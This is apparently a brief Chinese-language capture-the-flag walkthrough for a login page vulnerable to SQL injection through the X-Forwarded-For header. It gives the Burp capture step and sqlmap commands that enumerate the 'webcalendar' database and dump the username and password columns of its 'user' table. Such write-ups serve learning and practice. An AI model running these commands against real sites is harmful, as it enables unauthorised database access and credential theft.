隨便輸入用戶名密碼登錄,提示有ip信息,根據(jù)題目的意思是信息是根據(jù)x-forwarded-for的紙變得,所以本題存在x-forwarded-for注入
1.首先打開burp抓包,添加x-forwarded-for:*,將raw的信息存為txt文件,如下圖所示,速度比較慢,請耐心等待

image.png
2.爆出當(dāng)前的數(shù)據(jù)庫
sqlmap -r 1.txt --current-db --batch
3.爆表名
sqlmap -r 1.txt -D webcalendar -T user --columns --batch
4.爆表中的字段
sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch
5.爆出兩組賬戶密碼,進(jìn)行嘗試組合,即可登錄成功